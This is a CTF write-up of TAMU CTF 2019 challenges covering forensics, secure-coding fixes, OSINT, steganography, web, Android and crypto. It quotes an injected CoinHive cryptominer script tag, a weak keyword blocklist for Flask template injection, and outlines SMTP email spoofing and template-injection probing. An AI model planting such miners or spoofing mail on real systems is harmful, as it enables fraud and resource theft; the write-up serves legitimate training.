• I like TAMU ctfs for their scenario based questions with continuous problem solving and variety of ctf arena (android, pentest, network with general categories) to get started with.

  • Listed Problems/Writeups based on category

  • With everything going on and a single member team (TopWing), managed to take up as much challenge as possible spanning across various categories! Ended up at 200ish rank in the scoreboard. Also, I solved some extra challenges (partial work done before) after the CTF.

Scenario Based Problems

Is one big scenario broken into a number of problems/puzzles/questions to be solved


1) 0_intrusion

  • Given index.html, when requested on a browser –> it is evident the page is slow as it keeps loading for a long time (chrome tab icon for loading keeps looping)

  • Looking at the page source –> A glance spots a number of JS code loaded but one referred by an IP (third party script). The line seems obviously weird without any hostname (Easy)

  • Also, further evidence at chrome networks tab
  • Flag:
    <script src =></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>

2) 1_logs

Following up on the attack above…


  • Capture pcap file
  • web Server logs (the full base dir of the website)

As usual, I tried to leverage the new pcap parser (using scapy, pyshark) to analyse this capture. Extracting the streams (full duplex) from the pcap

  • Output of Full Duplex streams {'': {'mac': '02:42:0a:5e:c8:b5'}, '': {'mac': '08:00:27:ed:bd:bb'}, '': {'mac': '02:42:0a:bb:c3:5f'}, '': {'mac': '02:42:0a:14:66:7e'}, '': {'mac': '02:42:0a:aa:e6:78'}, '': {'mac': '02:42:0a:28:b4:3a'}, '': {'mac': '02:42:0a:52:5a:cb'}}
  • This capture was interesting because they did not use all the ports to connect. Even though the output above shows all the streams (including port scan failure traffic), attackers enumerated the ports which was interesting thing to consider.

  • Looking at the streams above it is much evident that the answer to the first question would be the one ip which scanned all the ports –>

  • For the ports which remained open at the web server, (did not yet have a way to visualize this behavior) so resorting to wireshark, Filter with known attacker ip + server ip and tcp ack or protocols –> ip.dst == && (tcp.flags.ack==1 && tcp.flags.syn==1) (syn ack response for tcp port open) returns the successfuly responded ports which were open –> 22, 80 (evident from the filtered wireshark results)

  • For third investigation, all the files that were exposed, I used a hybrid technique. Noted that file name enumeration was performed and only the files that were exposed in the webserver were asked.
    1. Used HTTP access logs with HTTP 200 returned apache2 -- access.log
    2. Export HTTP objects in Wireshark ( which included files that also did not exist ) –> ensured no files with invalid http tags.


1) 0_Network_Enumeration

  • Looking at the captures, we could easily spot http packets communication with (which should be a web server)
    * 1. Webserver packets response to http with codes
    * 2. Number of hosts that contacted
        * Output all full duplex streams
          - Used tshark or scapy.rdpcap.sessions()
          - I have written a wrapper at pcapxray which I resused
        * Used pcapxray ( new pcap engine )
            * 13 (count only http/https)

2) 1_Discovery

  • Attack happened by exfiltration –> webserver sends data with ICMP, HTTP and DNS to the attackers IP.

  • Time calculation


* Reading Rainbow: 1_Discovery
    * Host that is extracting the data
    * Time
        * 11:09
    * Protocols
        * DNS, HTTP, ICMP


1) 0_intrusion

  • Taking an overview of the Pcapfile with Wireshark for http/tls packets.
  • Checking the SSL connects –> Certificate information
  • The attackers certification organization says Dummy, obvious answer

Secure Coding

1) SQL

  • Challenge: Fix SQL Injection attack
Now that you have broken the SQL Injection challenge it's your turn to fix it!
  • Fixing Code - Using Prepared Statements
    /* Create prepared statements */
    $ps = $conn->prepare("SELECT * FROM login WHERE User=? AND Password=?");
    $ps->bind_param("ss", $user, $pass);
    $user = $_POST['username'];
    $pass = $_POST['password'];
    if ($result = $ps->get_result())
      if ($result->num_rows >= 1)
        $row = $result->fetch_assoc();
        echo "You logged in as " . $row["User"];
        $row = $result->fetch_assoc();
        echo "<html>You logged in as " . $row["User"] . "</html>\n";
      else {
        echo "Sorry to say, that's invalid login info!";
  • Run Log and Flag

2) PWNCoding

  • Challenge: Fix Buffer overflow attack
  • Fixing Code - using fgets to limit size of input
// Refer https://www.synopsys.com/blogs/software-security/detect-prevent-and-mitigate-buffer-overflow-attacks/
fgets(buf, sizeof(buf), stdin);
  • Run log and flag

3) Science

  • Challenge: Fix template injection attack in a Flask App
  • Fixing Code - Input Sanitization (especially blocking template execution functions - http://flask.pocoo.org/docs/1.0/templating/ )
# Input sanitize with Function blacklist
blacklist = ["config", "self", "request", "q", "__class__", "__dict__", "__group__", "session", "__", "[", "]", ", "]
for banned in blacklist:
    if banned in chem1 or banned in chem2:
        return "Template injection hack attempt!. Sorry, Something went wrong"
  • Run log and flag
  • What did not work?
    • Just removing the to prevent template execution did not work. Escape function use to escapt html did not work as they just escape the html to be returned.
    • Blacklisting subset of type
    • Not blacklisting some characters such as "[]'._-__ allows possibibilty to inject


1) Howdy

Initial introductory challenge to expose the flag format


2) Who Am I?

  • Challenge:
  • Answer

3) Who Do I Trust ?

  • Challenge:
  • Answer

4) Where Am I ?

  • Challenge:
  • For this method I wanted to put to use my tool urlRecon to perform reconnaissance on the url. City in geo location output is the flag.
root@kali:~/Downloads/urlRecon/urlrecon# cat ctf.txt 

(s) root@kali:~/Downloads/urlRecon/urlrecon# python main.py f ctf.txt 
 ==> Program Started at 2019-03-04 08:05:42.132872
 ==> Fetching Information for various URLs . 

 ==> Program ended at 2019-03-04 08:05:45.103283
 ==> Output Successfully Generated at /root/Downloads/urlRecon/urlrecon
 ==> Time for the Program to Complete Execution = 0:00:02.970411
 =========> Program Finished Successfully !!!

(s) root@kali:~/Downloads/urlRecon/urlrecon# ls
ctf.txt  examples  main.py  modules  report  s
(s) root@kali:~/Downloads/urlRecon/urlrecon# cd report/
(s) root@kali:~/Downloads/urlRecon/urlrecon/report# ls
report.txt  urlInformation.db  urlLocation.kml
(s) root@kali:~/Downloads/urlRecon/urlrecon/report# cat report.txt 

URL: https://tamuctf.com

Domain: tamuctf.com

DNS: ['']

whoIs Data: {
  "IpWhoIsResult": {
    "asn": "16509", 
    "asn_cidr": "", 
    "asn_country_code": "US", 
    "asn_date": "2015-09-02", 
    "asn_description": "AMAZON-02 - Amazon.com, Inc., US", 
    "asn_registry": "arin", 
    "entities": [
    "network": {
      "cidr": "", 
      "country": null, 
      "end_address": "", 
      "events": [
          "action": "last changed", 
          "actor": null, 
          "timestamp": "2015-09-02T13:06:29-04:00"
          "action": "registration", 
          "actor": null, 
          "timestamp": "2015-09-02T13:06:28-04:00"
      "handle": "NET-52-32-0-0-1", 
      "ip_version": "v4", 
      "links": [
      "name": "AT-88-Z", 
      "notices": [
          "description": "By using the ARIN RDAP/Whois service, you are agreeing to the RDAP/Whois Terms of Use", 
          "links": [
          "title": "Terms of Service"
          "description": "If you see inaccuracies in the results, please visit: ", 
          "links": [
          "title": "Whois Inaccuracy Reporting"
          "description": "Copyright 1997-2019, American Registry for Internet Numbers, Ltd.", 
          "links": null, 
          "title": "Copyright Notice"
      "parent_handle": "NET-52-0-0-0-0", 
      "raw": null, 
      "remarks": null, 
      "start_address": "", 
      "status": [
      "type": "DIRECT ALLOCATION"
    "nir": null, 
    "objects": {
      "AT-88-Z": {
        "contact": {
          "address": [
              "type": null, 
              "value": "410 Terry Ave N.\nSeattle\nWA\n98109\nUnited States"
          "email": null, 
          "kind": "org", 
          "name": "Amazon Technologies Inc.", 
          "phone": null, 
          "role": null, 
          "title": null
        "entities": [
        "events": [
            "action": "last changed", 
            "actor": null, 
            "timestamp": "2017-01-28T08:32:29-05:00"
            "action": "registration", 
            "actor": null, 
            "timestamp": "2011-12-08T13:34:25-05:00"
        "events_actor": null, 
        "handle": "AT-88-Z", 
        "links": [
        "notices": null, 
        "raw": null, 
        "remarks": [
            "description": "All abuse reports MUST include:\r\n* src IP\r\n* dest IP (your IP)\r\n* dest port\r\n* Accurate date/timestamp and timezone of activity\r\n* Intensity/frequency (short log extracts)\r\n* Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.", 
            "links": null, 
            "title": "Registration Comments"
        "roles": [
        "status": null
    "query": "", 
    "raw": null
  "WhoIsComResult": {
    " Name": " tamuctf.com\r", 
    "&gt;&gt;&gt; Last update of WHOIS database": " 2019-03-03T16", 
    "Admin City": " College Station\r", 
    "Admin Country": " US\r", 
    "Admin Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Admin Name": " Daniel Ragsdale\r", 
    "Admin Organization": " Texas A&M Cybersecurity Center\r", 
    "Admin Phone": " +979.8457398\r", 
    "Admin Postal Code": " 77843\r", 
    "Admin State/Province": " Texas\r", 
    "Admin Street": " 4254 TAMU\r", 
    "Creation Date": " 2018-08-20T20", 
    "DNSSEC": " unsigned\r", 
    "Domain Status": " clientTransferProhibited https", 
    "Name Server": " c.ns.joker.com\r", 
    "Registrant City": " College Station\r", 
    "Registrant Country": " US\r", 
    "Registrant Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Registrant Name": " Daniel Ragsdale\r", 
    "Registrant Organization": " Texas A&M Cybersecurity Center\r", 
    "Registrant Phone": " +979.8457398\r", 
    "Registrant Postal Code": " 77843\r", 
    "Registrant State/Province": " Texas\r", 
    "Registrant Street": " 4254 TAMU\r", 
    "Registrar": " CSL Computer Service Langenbach GmbH d/b/a joker.com\r", 
    "Registrar Abuse Contact Email": " <img src=\"/eimg/4/31/4314d7b7cb6fcbd8216fd48ab77de993df2c463f.png\" class=\"whois_email\" alt=\"email\">@joker.com\r", 
    "Registrar Abuse Contact Phone": " +49.21186767447\r", 
    "Registrar IANA ID": " 113\r", 
    "Registrar Registration Expiration Date": " 2019-08-20T20", 
    "Registrar URL": " https", 
    "Registrar WHOIS Server": " whois.joker.com\r", 
    "Registry Domain ID": " 2300145411_DOMAIN_COM-VRSN\r", 
    "Tech City": " College Station\r", 
    "Tech Country": " US\r", 
    "Tech Email": " <img src=\"/eimg/1/0f/10f8478dcca1d5e42f6ac97667f2cae578fbaed1.png\" class=\"whois_email\" alt=\"email\">@tamu.edu\r", 
    "Tech Name": " Daniel Ragsdale\r", 
    "Tech Organization": " Texas A&M Cybersecurity Center\r", 
    "Tech Phone": " +979.8457398\r", 
    "Tech Postal Code": " 77843\r", 
    "Tech State/Province": " Texas\r", 
    "Tech Street": " 4254 TAMU\r", 
    "URL of the ICANN Whois Inaccuracy Complaint Form": " https", 
    "Updated Date": " 2018-08-20T20"

Server Fingerprint: None

Geo Location: {
  "asn": "AS16509", 
  "city": "Boardman", 
  "continent_code": "NA", 
  "country": "US", 
  "country_calling_code": "+1", 
  "country_name": "United States", 
  "currency": "USD", 
  "in_eu": false, 
  "ip": "", 
  "languages": "en-US,es-US,haw,fr", 
  "latitude": 45.8491, 
  "longitude": -119.7143, 
  "org": "Amazon.com, Inc.", 
  "postal": "97818", 
  "region": "Oregon", 
  "region_code": "OR", 
  "timezone": "America/Los_Angeles", 
  "utc_offset": "-0800"
  • Answer

5) I heard you like files?

–> Yay! Stegano

  • Challenge
  • Given: a png file and the hint says pdf research was done. Lets look for pdf files…
  • Initial Recon of the Png using usual img_info, binwalk, file, pngcheck gives away a number of info that the png file has much more data

    • binwalk helped to detect and extract corresponding files
  • binwalk extract known types (for easy scanning) with the command binwalk -e art.png <a href=https://stackoverflow.com/questions/36530643/use-binwalk-to-extract-all-files>Reference</a>

  • Files Directory after first binwalk extract

    not_the_flag.txt - obviously doesnt have the flag
    A bunch of font files, pdf file (dummy text), metadata and some directories

  • The word/media folder seems interesting and it contains another image file as well. –> /word/media/image1.png - Repeat the above steps on the new image again…
> This issue here is that even though binwalk shows existence of a png file and pdf file, extracting only the known types with `-e` option doesnt help. (file magic number header + tailers remain undetectable)
> Extract all with the option binwalk -D='.*' image1.png
  • As we saw in the binwalk output, 1485 is the address of the pdf file. So we change the extension to pdf to view this file. ( We only get a new image and pdf file)
  • Opening the pdf file shows…
  • After some digging for a long time, Read the pdf file from top bottom to understand if there is any hidden text or hidden section unexposed in the pdf. Found a string in the trailer which looked like encoded. Decoded base64 to obtain the answer. (Learning: Keep digging and dont stop –> look for all minimal details)

6) OnBoarding Checklist

  • I had done some email spoofing before so was pretty confident but this challenged me a bit. This was an interesting challenge that helped to learn about SMTP relay.

  • Challenge

  • Understanding:
Spoof email with
* FROM < someguy@somebigcorp.com > "authorized user"
* TO < tamuctf.com > "authotization provider"
* BODY < ***@gmail.com > "user being authorized < any fake gmail account >" 
  • Use MX DNS record (Mail Exchange Server) of the somebigcorp.com domain to accomplish this
  • Try sending a spoof email…

451 Relay not permitted error!

  • As noted, the recepient email is from gmail. Try sending a spoof email with Gmail’s MX server (Same steps as above)
  • That worked and I received the flag at my fake gmail address
  • What did not work?
  • Before I found the reference below, I drained my motivation with these steps below.
  • As soon as I saw this challenge I resorted to using Mail Exchange server of somebigcorp.com and use smtplib from python and mail server of somebigcorp.com - Failed!
  • Did the same with Gmail MX servers from smtplib with TLS but did not work either. Authentication was required as I connected to other gmail mail servers. Even with authentication I was not able to spoof email - Failed!
  • Went kiddies method to use anonymous mail online provisions like anonymail to do the same. I did not get the flag as tamuctf was smarter. - Failed!
  • After some series of research, mitigations have been in place for the relay errors, hence the only solution I assumed remaining was to setup a relay smtp server in Amazon EC2 or Google Cloud to increase the trust of the relay and use that to do the same. < This was pending until I found the helper >

  • Reference:
    • This read helped me a lot which I stumbled upon when working with another challenge
      <a href=https://medium.com/@the4rchangel/email-spoofing-with-netcat-telnet-e558e4a10c1>Help</a>


1) Not another SQLI challenge

This is obvious as a login page is given. Sql inject username and password.

  • Challenge
  • Target
  • Flag
  • Helper

2) Robots Rule

As the name says, it should deal with robots.txt to provision web crawling and blacklist/whitelist pages.

  • Challenge
  • The Rule - There seems to be no disallow rule. From the error message it is evident that is it expecting a bot user-agent especially google bot based on the error returned.
  • Flag - Spoof a Robot
  • Helper
    • <a href=https://www.keycdn.com/blog/web-crawlers>reference</a>

3) manyGigemsToYou

The webiste structure or map

  • index.html (just shows thumbs up image and has many of them)
  • cookies.html (just shows cookies image and has many of them)
  • When cookies.html is accessed, there is request to cook.js which returns 4 cookies (stored in cache)
  • All cookie parameters seems to be valid. Also, strings/tokens dont make any sense as a standalone.

Gigems page

Cookies page


– Looking at the SOURCE CODE: Prominent thing that is obervable –> there are various strings

  • in the cookie
  • in the alt tag of the images

– Listing all the strings encountered here eliminting repetition

##### Guess based on
# Appending the continue and reconstructing the flag.

##### All the strings encountered

=====> document.cookie 
gigem_continue: cookies}
Cookie: flag cookie gigem flag cookie
Gigs: all_the_cookies
Hax0r: flagflagflagflagflagflag

=====> Gigs! page

======> Cookie! page
gigem{continued == source_and_
  • Flag is Gigem{flag_in_source_and_cookies}

4) Science

  • Challenge
  • Given:
    • A website which takes INPUT and returns them in the output. A Flask service.
  • Thoughts:
    • This is the first time I was taking a flask ctf challenge. Looking for common vulnerability with inputs
      • xss and some common vuln did not provide result and did not make sense.
      • fuzzing the input for few seconds was meaningless
    • Looking for INPUT vulberability in FLASK service throws –> Template Injection
  • Initial test for template injection
Check target website for vulnerability in Action
  • Read the Python Flask documentation for template function that I can access. Try the basic config function
  • More Functions test (different data fetching) like self, config, request, get_url_for, __dict__, __globals__, environ, globals
    • This helped me solve the secure coding challenge to fix the code ( sanitize inputs with the test)
Screenshots of different function output
  • Flag:
  • References:
    • https://www.we45.com/blog/server-side-template-injection-a-crash-course-
    • https://ctftime.org/writeup/10895
    • https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
    • https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
    • https://medium.com/bugbountywriteup/tokyowesterns-ctf-4th-2018-writeup-part-3-1c8510dfad3f
    • https://damyanon.net/post/flask-series-security/
    • https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

5) Buckets

  • Challenge
  • I had already solved a cloud challenge during neverLanCtf so wondered if this should be some improper authorization configuration

  • Recon tamuctf bucket

  • Going to amazon s3 subdomain with the bucket name.
  • Navigating to corresponding link for the flag
  • Flag


1) Strings

  • Find the secrets?

  • I have done some android prog/proj, vales are stores in strings.xml, would that be the obvious hint in the challenge name ?

  • Used strings tool to run with the binary apk file for exposing the flag (it was unsuccessfull.)

  • I am new to reversing android apps, google lead me to this nice project.

apktool –> https://github.com/iBotPeaches/Apktool

  • Apk file is a zip file. Unzip howdyapp.apk –> We get most of the files and most of them are non readable. Except for some strings. Basic grep and search for flag, secret, gigem{ were unsuccessfull too.

  • Ok, now using the tool apktool d howdyapp.apk

root@kali:~/Downloads/howdyapp# apktool d howdyapp.apk 
I: Using Apktool 2.3.4 on howdyapp.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
I: Loading resource table from file: /tmp/1.apk

I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
  • Reading this resource about android secret also helped –> https://rammic.github.io/2015/07/28/hiding-secrets-in-android-apps/

  • Looking at res/values/strings.xml has the flag as one of the param

  • Flag: gigem{infinite_gigems}


1) -.-

Obviously, Dot and Dash == Morse Code

  • Challenge
  • Morse coded cipher text dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit


  • Format differening from using literal .- vs di dah was a little confusion. This helper helped
  • Python decode Morse with Mapping of ASCII to Morse
import sys
morse_decode_dict = {
        "di-dah": "A",
        "dah-di-di-dit": "B",
        "dah-di-dah-dit": "C",
        "dah-di-dit": "D",
        "dit": "E",
        "di-di-dah-dit": "F",
        "dah-dah-dit": "G",
        "di-di-di-dit": "H",
        "di-dit": "I",
        "di-dah-dah-dah": "J",
        "dah-di-dah": "K",
        "di-dah-di-dit": "L",
        "dah-dah": "M",
        "dah-dit": "N",
        "dah-dah-dah": "O",
        "di-dah-dah-dit": "P",
        "dah-dah-di-dah": "Q",
        "di-dah-dit": "R",
        "di-di-dit": "S",
        "dah": "T",
        "di-di-dah": "U",
        "di-di-di-dah": "V",
        "di-dah-dah": "W",
        "dah-di-di-dah": "X",
        "dah-do-dah-dah": "Y",
        "dah-dah-di-dit": "Z",
        "dah-dah-dah-dah-dah": "0",
        "di-dah-dah-dah-dah": "1",
        "di-di-dah-dah-dah": "2",
        "di-di-di-dah-dah": "3",
        "di-di-di-di-dah": "4",
        "di-di-di-di-dit": "5",
        "dah-di-di-di-dit": "6",
        "dah-dah-di-di-dit": "7",
        "dah-dah-dah-di-dit": "8",
        "dah-dah-dah-dah-dit": "9"

flag_morse = open("flag.txt", "r")
flag_morse_content = flag_morse.read().strip().split(" ")
result = ""
for word in flag_morse_content:
    if word in morse_decode_dict:
        result += morse_decode_dict[word]
        print word, morse_decode_dict
print result
print "\n"
print result[2:].decode("hex")
  • Flag

2) RSaaay

  • Challenge
  • Less confidence on Crypto Challenge but knew the RSA concept so took it over…

  • Steps tried:
    1) As it was an easy challenge assumed just (n,d) were given to decrypt ( big math operation challenge and RSA operates on numbers for enc/dec )

    • string –> hex –> int [Fail]
      2) Assumed p, q to be given to compute rsa
    • after few failed attempt, remembered something –> one of the number in the given pair () was not prime. So it was meaningless to assume p, q. So the number that is not prime should be n [Fail]
      3) Assume the given pair is (n, d) [Success]
    • Ended up at Alok's blog to crack rsa
    • Key crack and generation was success, but decryption failed. Even tried space separated data. Did not work and I was rushing to get the flag.
    • Used the same params and performed decryption on the crypttool and the converted the integers obtained to char

Used a hybrid method –> Followed Alok’s blog until it made sense then used RSA calculator to solve it.

  • Checking for Prime number helped resolve the confusion
  • Steps followed from Alok’s blog to crack rsa
  • the private key
  • Used the RSA calculator to proceed at https://www.cs.drexel.edu/~jpopyack/IntroCS/HW/RSAWorksheet.html
  • Decrypt each part of the cipher text and convert them back to characters
  • Flag

— This method is not recommended to be followed as I rushed my way seeking references to find the flag ultimately. I will publish a more reliable method soon.

  • Reference:
* Alok's Blog Helped a lot for this challenge: https://www.quaxio.com/exploring_three_weaknesses_in_rsa/
* https://www.cryptool.org/en/cto-highlights/rsa-step-by-step
